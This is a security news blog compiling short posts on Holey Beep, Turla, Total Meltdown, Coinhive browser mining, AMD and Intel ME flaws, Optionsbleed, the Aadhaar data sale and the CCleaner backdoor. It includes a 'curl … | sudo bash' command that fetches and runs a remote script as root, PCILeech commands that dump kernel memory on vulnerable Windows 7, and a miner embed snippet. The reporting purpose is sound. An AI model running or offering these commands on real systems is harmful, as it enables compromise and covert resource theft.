Holey Beep (CVE-2018-0492) is the latest breakthrough in the field of acoustic cyber security research.
https://twitter.com/0dayMarketing is writing abound a cool sounding vuln discovered.
Am I vulnerable?
Most likely! If you have beep installed as setuid and it was compiled with a certain compiler version and options and your machine is compromised, your network is at risk.
Please run this command to find out: curl
https://holeybeep.ninja/am_i_vulnerable.sh | sudo
bash
If your computer is vulnerable it will beep.
Is this vulnerability serious?
Holey Beep is just a simple privilege escalation bug. However, it can be used in an exploit chain to trigger more serious issues.
Were there any signs of exploitation in the wild?
We found this YouTube video that outlines the exploitation steps.
TURLA aka EpicTurla, Waterbug, Whitebear, Venomous Bear, KRYPTON, TAG_0530, Pfinet, WRAIT, Grou 88, Snake, Hippo Team
While doing a background training for my team, you might be interested in my
writing of the famous "Turla" group.
In some technical way, a fascinating
professional and skilled group.
Read the whole story via this link on my page.
Multi-Stage Email Word Attack Without Macros
Malware authors often distribute malware through code macros in Microsoft Office documents such as Word, Excel, or PowerPoint. Regardless of the particular Office version, macros can be executed whenever the user opens the file. By default users get warnings from Office that the file they are about to open will run a macro, but at that point it's up to the user to decide whether to take the risk.
Recently, we have been receiving a lot of standard macro-related downloaders, most of them distributed from the Necurs botnet. However, the sample we look at today takes a longer, macro-less approach.
We have been monitoring an email spam campaign where opening the attachment downloads a password stealer as its final payload. However, getting to that payload uses a four-stage infection process, as summarized below.
Continue reading at: 
Notice to stakeholders: withdrawal of the United Kingdom and EU rules on .eu domain names
As the UK voted to "brexit", it even has effects on the internet.
As of the withdrawal date, undertakings and organisations that are established in the United Kingdom but not in the EU, and natural persons who reside in the United Kingdom will no longer be eligible to register .eu domain names or, if they are .eu registrants, to renew .eu domain names registered before the withdrawal date.
Rs 500, 10 minutes, and you have access to billion Aadhaar (1.4 billion India citizen) details
Read
the complete article here.
"It was only last November that the UIDAI asserted that “Aadhaar data is fully safe and secure and there has been no data leak or breach at UIDAI.” Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far."
A quick chat, and full access
- 12:30 pm: This correspondent posing as ‘Anamika’ contacted a person on WhatsApp number 7610063464, who introduced himself as ‘Anil Kumar’. He was asked to create an access portal.
- 12:32pm: Kumar asked for a name, email ID and mobile number, and also asked for Rs 500 to be credited in his Paytm No. 7610063464.
- 12:35 pm: This correspondent created an email ID, aadharjalandhar@gmail.com, and sent mobile number ******5852 to the anonymous agent.
- 12:48 pm: Rs 500 transferred through Paytm.
- 12:49 pm: This correspondent received an email saying, “You have been enrolled as Enrolment Agency Administrator for ‘CSC SPV’. Your Enrolment Agency Administrator ID is ‘Anamika_6677’.” Also, it was said that a password would be sent in a separate mail, which followed shortly.
- 12:50 pm: This correspondent had access to the Aadhaar details of every Indian citizen registered with the UIDAI.
Oracle vs. Google is still a thing, thanks to US federal court
Engadget writes about an 9,3 billion dollar fine against Google:
"The fight between Oracle and Google has been going on for years, and now there's been a development, according to Bloomberg. The US Court of Appeals found that Google violated Oracle's copyrights through its use of Java code in the Android operating system. The case is now going back to a California federal court to determine how much Alphabet owes Oracle. The Supreme Court has already sent this case back down once, but you can bet that Google will appeal this decision."
Continue here...
Mastermind behind €1 billion cyber bank robbery arrested in Spain
The spanish news "The Local" has a nice article about justice coming true in real world. :-)
Photo: billiondigital/Depositphotos
Spain and Europol on Monday announced the arrest of a Ukrainian man dubbed the mastermind of a gang behind hundreds of cyberattacks that have netted around a billion euros from banks.
Continue here...
Total Meltdown?
Posted by Ulf Frisk at his blog:
...
"Did you think Meltdown was bad? Unprivileged applications
being able to read kernel memory at speeds possibly as high as megabytes per
second was not a good thing.
Meet the Windows 7 Meltdown patch from
January. It stopped Meltdown but opened up a vulnerability way worse ... It
allowed any process to read the complete memory contents at gigabytes per
second, oh - it was possible to write to arbitrary memory as well." ...
Can I try this out myself?
Yes absolutely. The technique has been
added as a memory acquisition device to the PCILeech direct
memory access attack toolkit. Just download PCILeech and execute it
with device type: -device totalmeltdown on a vulnerable Windows 7
system.
Dump memory to file with the command: pcileech.exe dump -out
memorydump.raw -device totalmeltdown -v -force .
If you have
the Dokany file system driver installed you
should be able to mount the running processes as files and folders in
the Memory
Process File System - with the virtual memory of the kernel
and the processes as read/write.
To mount the processes issue the
command: pcileech.exe mount -device
totalmeltdown .
Mine cryptocurrencies Monero (XMR) and Electroneum (ETN) using CoinHive
How easy it is, to use your visitors browser to mine some bitcoins for you...
Load the Coinhive Miner and start mining
<script src="httxs://coinhive[.]com/lib/coinhive[.]min[.]js"></script>
<script>
var miner = new CoinHive[.]User('SITE_KEY', 'john-doe');
miner.start();
</script>
Get the number of hashes solved by a user
curl "httxs://api[.]coinhive[.]com/user/balance?name=john-doe&secret=<secret-key>"
# {success: true, name: "john-doe" balance: 4096}
FossBytes did a good list of actions you might take to fight against it.
And PaloAlto did a very good writing with a lot of background information on that topic. A must read I think.
Yuchen Zhou, Jun J. Wang, Wayne Xin, Wei Xu Oct 17, 2017 at 12:00 AM
Cryptocurrencies have taken the world by storm, from the biggest player Bitcoin to newcomers such as Monero and Ethereum. Cryptocurrency mining has thus become a hot industry, from powerful, dedicated mining hardware to exploiting graphics card's parallel computing power. Recently, browser coin mining has taken off, for a lot of different reasons. Although the computing power (per instance) is much less than dedicated hardware, being able to exploit many users on various sites more than make up for it. There are already quite some media coverage on them, such as BBC, and malwarebytes. While we do not consider crypto-currency mining inside browsers malicious by itself, it is often time that such mining is going on without the end user's consent or even knowledge that makes this practice shady and despicable.
Coinhive, one of the more popular browser-mining services out there offers site owners a piece of JavaScript for easy integration. Site owners exploit site visitor's CPU time to mine XMRs (Moneros) for Coinhive, and Coinhive pays out 70% of mined value to site owners. A new player, crypto-loot emerged recently which offers similar services but pays out 88% of revenue. ... continue here
AMD allegedly has its own Spectre-like security flaws
On March 12, 2018, AMD received a communication from CTS Labs regarding
research into security vulnerabilities involving some AMD products. Less than 24
hours later, the research firm went public with its findings. Security and
protecting users’ data is of the utmost importance to us at AMD and we have
worked rapidly to assess this security research and develop mitigation plans
where needed. This is our first public update on this research, and will cover
both our technical assessment of the issues as well as planned mitigation
actions. continue
post from mark.papermaster 
in AMD
Corporate.
|
Vulnerability Groups |
Problem Description & Method of Exploitation |
Potential Impact |
Planned AMD Mitigation |
|
MASTERKEY and PSP Privilege Escalation (AMD Secure Processor or “PSP” firmware) |
Issue: Attacker who already has compromised the security of a system updates flash to corrupt its contents. AMD Secure Processor (PSP) checks do not detect the corruption.
Method: Attacker requires Administrative access |
Attacker can circumvent platform security controls. These changes are persistent following a system reboot. |
Firmware patch release through BIOS update. No performance impact is expected.
AMD is working on PSP firmware updates that we plan to release in the coming weeks. |
|
RYZENFALL and FALLOUT
(AMD Secure Processor firmware) |
Issue: Attacker who already has compromised the security of a system writes to AMD Secure Processor registers to exploit vulnerabilities in the interface between x86 and AMD Secure Processor (PSP).
Method: Attacker requires Administrative access. |
Attacker can circumvent platform security controls but is not persistent across reboots.
Attacker may install difficult to detect malware in SMM (x86). |
Firmware patch release through BIOS update. No performance impact is expected.
AMD is working on PSP firmware updates that we plan to release in the coming weeks. |
|
“Promontory” |
|||
|
CHIMERA “Promontory” chipset used in many socket AM4 desktop and socket TR4 high-end desktop (HEDT) platforms. AMD EPYC server platforms, EPYC and Ryzen Embedded platforms, and AMD Ryzen Mobile FP5 platforms do not use the “Promontory” chipset. |
Issue: Attacker who already has compromised the security of a system installs a malicious driver that exposes certain Promontory functions.
Method: Attacker requires Administrative access. |
Attacker accesses physical memory through the chipset.
Attacker installs difficult to detect malware in the chipset but is not persistent across reboots. |
Mitigating patches released through BIOS update. No performance impact is expected.
AMD is working with the third-party provider that designed and manufactured the “Promontory” chipset on appropriate mitigations. |
Disabling Intel ME 11 via undocumented mode
Read this fantastic articel to learn how to disable the probable biggest NSA backdoor by using an off-switch the NSA had implemented for it's own high-secure systems.
As per Mark Ermolov, Maxim Goryachy:
"Our team of Positive Technologies researchers has delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. In this article, we describe how we discovered this undocumented mode and how it is connected with the U.S. government's High Assurance Platform (HAP) program."
The remaining text of the article is available here.
If you are intrested in a more depth dive into this area, read the eBook of Xiaoyu Ruan.
Optionsbleed - HTTP OPTIONS method can leak Apache's server memory
If you're using the HTTP protocol in everday Internet use you are usually
only using two of its methods: GET and POST. However HTTP has a number of other
methods, so I wondered what you can do with them and if there are any
vulnerabilities.
One HTTP method is called OPTIONS. It simply allows asking a
server which other HTTP methods it supports. The server answers with the "Allow"
header and gives us a comma separated list of supported methods.
A scan
of the Alexa Top 1 Million revealed something strange: Plenty of servers sent
out an "Allow" header with what looked like corrupted data. Some
examples:
Allow: ,GET,,,POST,OPTIONS,HEAD,,
Allow:
POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,,
HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow:
GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE
... read the whole article at the original website.
CCleaner had a backdoor
PAUL YUNG
VP, Products
Dear CCleaner customers, users and supporters,
We would like to apologize for a security incident that we have recently found in CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191. A suspicious activity was identified on September 12th, 2017, where we saw an unknown IP address receiving data from software found in version 5.33.6162 of CCleaner, and CCleaner Cloud version 1.07.3191, on 32-bit Windows systems. Based on further analysis, we found that the 5.33.6162 version of CCleaner and the 1.07.3191 version of CCleaner Cloud was illegally modified before it was released to the public, and we started an investigation process. We also immediately contacted law enforcement units and worked with them on resolving the issue. Before delving into the technical details, let me say that the threat has now been resolved in the sense that the rogue server is down, other potential servers are out of the control of the attacker, and we’re moving all existing CCleaner v5.33.6162 users to the latest version. Users of CCleaner Cloud version 1.07.3191 have received an automatic update. In other words, to the best of our knowledge, we were able to disarm the threat before it was able to do any harm.
Technical description
An unauthorized modification of the
CCleaner.exe binary resulted in an insertion of a two-stage backdoor capable of
running code received from a remote IP address on affected systems.
The suspicious code was hidden in the application’s initialization code called CRT (Common Runtime) that is normally inserted during compilation by the compiler. This code modification was executed by the following function calls (functions marked by red represent the CRT modifications):
This modification performed the following actions before the main application’s code:
- It decrypted and unpacked hardcoded shellcode (10 kB large) - simple XOR-based cipher was used for this.
- The result (16 kB in size) was a DLL (dynamic link library) with a missing MZ header.
- This DLL was subsequently loaded and executed in an independent thread.
- Afterwards, a normal execution of CRT code and main CCleaner continued, resulting in the thread with payload running in the background.
Illustration of patched CRT code (see the added call to a payload-decryption routine in the modified version):
The code executed within that thread was heavily obfuscated to make its analysis harder (encrypted strings, indirect API calls, etc.). The suspicious code was performing the following actions:
- It stored certain information in the Windows registry key
HKLM\SOFTWARE\Piriform\Agomo:
- MUID: randomly generated number identifying a particular system. Possibly also to be used as communication encryption key.
- TCID: timer value used for checking whether to perform certain actions (communication, etc.)
- NID: IP address of secondary CnC server
- Name of the computer
- List of installed software, including Windows updates
- List of running processes
- MAC addresses of first three network adapters
- Additional information whether the process is running with administrator privileges, whether it is a 64-bit system, etc.
At this stage, we don’t want to speculate how the unauthorized code appeared in the CCleaner software, where the attack originated from, how long it was being prepared and who stood behind it. The investigation is still ongoing. We want to thank the Avast Threat Labs for their help and assistance with this analysis.
Again, we would like to apologize for any inconvenience this incident could have caused to our clients; we are taking detailed steps internally so that this does not happen again, and to ensure your security while using any of our Piriform products. Users of our cloud version have received an automated update. For all other users, if you have not already done so, we encourage you to update your CCleaner software to version 5.34 or higher, the latest version is available for download here.
Thank you,
Paul Yung
VP Products
